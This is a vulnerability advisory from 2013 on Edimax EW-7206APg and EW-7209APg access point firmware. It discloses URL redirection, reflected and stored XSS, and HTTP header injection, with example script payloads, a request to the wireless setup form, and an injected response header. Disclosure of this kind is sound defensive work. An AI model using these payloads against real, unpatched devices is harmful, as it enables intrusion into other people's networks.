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Multiple Vulnerabilities in Edimax EW-7206-APg and EW-7209APg

Device Name: EW-7206APg / EW-7209APg
Vendor: Edimax

============  Vulnerable Firmware Releases: ============ 

Device: EW-7206APg
 Hardware Version               Rev. A
 Runtime Code Version   v1.32 
 Runtime Code Version   V1.33

Device: EW-7209APg
 Hardware Version               Rev. A
 Runtime Code Version   1.21 
 Runtime Code Version   1.29 

============ Device Description: ============ 

Acting as a bridge between the wired Ethernet and the 2.4GHz IEEE 802.11g/b 
wireless LAN, this wireless LAN access point can let your wireless LAN client 
stations access both the wired and the wireless network nodes.

EW-7209APg: http://www.edimax-de.eu/de/support_detail.php?pd_id=18&pl1_id=1

============ Vulnerability Overview: ============ 

* URL Redirection: 
        Parameter:      submit-url and wlan_url

* reflected XSS:
        Parameter:      submit-url and wlan-url
Injecting scripts into the parameter submit-url or wlan-url reveals that this 
parameter is not properly validated for malicious input.

Example Exploit:><script>alert('XSSed')</script>test

* stored XSS 

        * in System Utility -> Domain Name:
                => parameter: DomainName
Injecting scripts into the parameter DomainName reveals that this parameter is 
not properly validated for malicious input. You need to be authenticated or you 
have to find other methods for inserting the malicious JavaScript code.";><script>alert(2)</script>&leaseTimeGet=946080000&leaseTime=946080000&B1.x=52&B1.y=21&submit-url=%2Fsysutility.asp&ipChanged=

        * Stored XSS in wireless settings / basic settings -> ESSID
                -> The injected script code gets executed within the device 

Injecting scripts into the parameter ssid reveals that this parameter is not 
properly validated for malicious input. You need to be authenticated or you 
have to find other methods for inserting the malicious JavaScript code.

Example Request:
POST /goform/formWlanSetup HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Authorization: Basic xxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 351


* HTTP Header Injection:

        Parameter: submit-url

Injecting code into the parameter submit-url mode reveals that this parameter 
is not properly validated for malicious input and so it is possible to 
manipulate the header information.

HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Sat Jan  1 14:06:23 2000
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
New Header: PWND

============ Solution ============

No known solution available.

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de
Advisory URL: http://www.s3cur1ty.de/m1adv2013-009
Twitter: @s3cur1ty_de

============ Time Line: ============

September 2012 - discovered vulnerability
21.09.2012 - contacted vendor with vulnerability details
24.09.2012 - vendor responded that they will not provide a fix
14.02.2013 - public disclosure

===================== Advisory end =====================